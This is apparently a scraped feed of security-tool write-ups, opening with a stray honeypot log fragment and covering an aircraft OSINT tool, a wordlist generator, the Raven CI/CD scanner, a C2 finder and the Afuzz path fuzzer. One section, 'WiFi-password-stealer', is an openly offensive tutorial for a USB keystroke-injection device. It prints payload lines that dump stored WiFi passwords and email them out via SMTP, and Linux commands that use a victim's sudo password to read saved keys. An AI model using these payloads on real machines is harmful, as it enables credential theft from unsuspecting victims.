{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

😑

% curl http://localhost:8888/i-mean-are-you-a-fake-server
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

By: Zion3R

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject, in this case planes!

Aircraft Information

  • Tail Number 🛫
  • Aircraft Type ⚙️
  • ICAO24 Designation 🔎
  • Manufacturer Details 🛠
  • Flight Logs 📄
  • Aircraft Owner ✈️
  • Model 🛩
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack works best with Python 3.

Preview

Features

skytrack features three main functions for aircraft information gathering and display. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you to save the collected aircraft information to a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The report will be entitled "skytrack_report.pdf".

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumeric ID starting with the letter "N" used to identify aircraft. The ICAO designation is a six-character fixed-length ID in hexadecimal format. Both standards are highly pertinent for aircraft reconnaissance, as both can be used to search for a specific aircraft in data sources. However, converting from one format to the other follows a tricky algorithm and can be rather cumbersome. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address    N-Number (Tail Number)
a00001          N1
a00002          N1A
a00003          N1AA

You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

⚠️ The converter only works for USA-registered aircraft

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R


WEB-Wordlist-Generator scans your web applications and creates related wordlists so you can take preliminary countermeasures against cyber attacks.


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application in a container after building the Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application in a container after pulling it from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.



Raven - CI/CD Security Analyzer

By: Zion3R


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub. All vulnerabilities discovered using Raven are listed in the tool's Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to setup the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database by browsing to http://localhost:7474/browser/.
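You can also query the graph programmatically with the Neo4j Python driver, using the credentials from Step 2. A hedged sketch (the Cypher below is deliberately schema-agnostic, since node labels depend on Raven's indexer; adapt it to what you see in the browser):

from neo4j import GraphDatabase   # pip install neo4j

# Count nodes per label to get a feel for the indexed graph.
driver = GraphDatabase.driver("neo4j://localhost:7687",
                              auth=("neo4j", "123456789"))
with driver.session() as session:
    query = "MATCH (n) RETURN labels(n) AS labels, count(*) AS c ORDER BY c DESC"
    for record in session.run(query):
        print(record["labels"], record["c"])
driver.close()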

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool contains three main functionalities: download, index and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default: 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a GitHub token. For authenticated users, the following rate limits apply:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

  • It is possible to run an external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run an external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case: a user can pass a pull request title (which is a controllable parameter) to an action parameter named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path to code execution.
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform, which offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery lifecycle.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating the pico-ducky, you only need to copy the modified payload (adjusted with your SMTP details for the Windows exploit, and/or with the Linux password and USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have internet access in order to send the stolen data over SMTP for exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. ENTER/SPACE simulate presses of those keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email address using Yahoo SMTP. For more detailed instructions visit the following link. The payload template also needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use an SMTP server from another email provider, but be mindful of the SMTP server address and port number you write into the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles and uses plugins for reading/writing data. The keyfile plugin uses an .ini-style keyfile format to store network configuration profiles; it supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex to extract the data of interest. For file filtering, a positive lookbehind assertion was used ((?<=keyword)). The positive lookbehind matches at a position right after the keyword without making the keyword itself part of the match, so the regex (?<=keyword).* matches any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
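The same lookbehind is easy to try out in Python against a sample keyfile snippet (the values here are made up):

import re

keyfile = "ssid=HomeWiFi\npsk=hunter2\n"
print(re.search(r"(?<=ssid=).*", keyfile).group())   # HomeWiFi
print(re.search(r"(?<=psk=).*", keyfile).group())    # hunter2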

For more information about NetworkManager, here are some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in; the machine sees it only as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy; quite the opposite, it's rather bulky, especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.



Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to scan google.com on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need a Netlas API key, which you can get from the Netlas website. You can then build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found at the given IP address or domain.

Support

Name Support
Metasploit
Havoc
Cobalt Strike
Bruteratel
Sliver
DeimosC2
PhoenixC2
Empire
Merlin
Covenant
Villain
Shad0w
PoshC2

Legend:

  • ✅ - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the terms described in the LICENSE file; see that file for details.



Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Afuzz automatically detects the development language used by the website and generates extensions accordingly
  • Uses a blacklist to filter invalid pages
  • Uses a whitelist to find content that bug bounty hunters are interested in on the page
  • Filters random content in the page
  • Judges 404 error pages in multiple ways
  • Performs statistical analysis on the results after scanning to obtain the final result
  • Supports HTTP/2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | product.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
